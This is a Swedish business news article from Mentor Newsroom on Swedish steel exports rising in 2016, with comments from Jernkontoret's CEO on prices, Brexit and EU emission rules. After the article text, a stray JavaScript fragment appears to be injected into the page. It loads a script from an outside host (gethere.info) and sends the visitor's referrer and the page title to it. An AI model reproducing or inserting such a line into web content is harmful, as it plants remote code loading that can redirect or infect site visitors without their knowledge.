Svensk stålexport ökar - Mentor Newsroom
finns!
Mentor Communications Group logotype
30 maj 2017
Mentor Newsroom lototype
23 redaktioner – Sveriges mest initierade näringslivsbevakning.
Verkstäderna - Tillverkande industri
2017-01-27 | 09:39
Verkstäderna logotype
bo-erikpehrs

Svensk stålexport ökar

Stålindustrin kan se tillbaka på ett relativt bra år där den samlade svenska stålexporten i vikt räknat ökade med 10 procent och i värde uppgick till cirka 40 miljarder kronor.

− Förra året var ett bra stålår sett till den totala mängden vi exporterar. Vi lider dock av ett lägre världsmarknadspris under början av året som, trots en ökad exportvolym, ger oss ungefär samma intäkter som förra året, säger Bo-Erik Pers, vd på Jernkontoret.

Stålproduktionen i världen låg still i vissa delar och gick ner något i andra delar under 2016. Subventionerad och dumpad export har påverkat stålpriserna negativt under årets första del, och därmed påverkat intäkterna från den svenska stålexporten

− Trots stora utmaningar hade svensk stålindustri framgångar under det förra året. Vi är starkt nischade. Vi konkurrerar mestadels med special­stål och behåller våra positioner som världsledande på flera områden. De största framgångarna ser vi hos de företag som jobbar mot bilindustrin, en industri som går väldigt bra just nu, säger Bo-Erik Pers.

130 länder

– Vi ser positivt på framtiden även om det finns flera frågetecken i omvärlden. Faktorer som skulle kunna påverka utvecklingen är till exempel Storbritanniens hantering av Brexit och Donald Trump som ny president i USA. Vidare ser vi med en viss oro på utvecklingen av EU:s system för utsläppsrätter. Vi ser även fortsatta statliga subventioner som påverkar marknaden och den fria handeln negativt.

Svenskt stål exporterades under 2016 till drygt 130 länder, varav EU (inklusive Norden) fortsatt är den viktigaste marknaden, men även USA och Kina mottog betydande andelar av den svenska stålexporten. USA och Kina har under de senaste tio åren blivit allt mer betydelsefulla marknader, men 70 procent av den svenska stålexporten går fortfarande till andra EU-länder och Norge.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

ANNONS:
ANNONS:
ANNONS:

MENTOR NYHETSBREV

Vill du ha Mentornewsroom nyhetsbrev - fyll i din e-postadress nedan
Huvudkontoret: Tryffelslingan 10,181 72 Lidingö Box 72001, Tel 08-670 41 00. Hitta hit!

© MENTOR COMMUNICATIONS AB 2013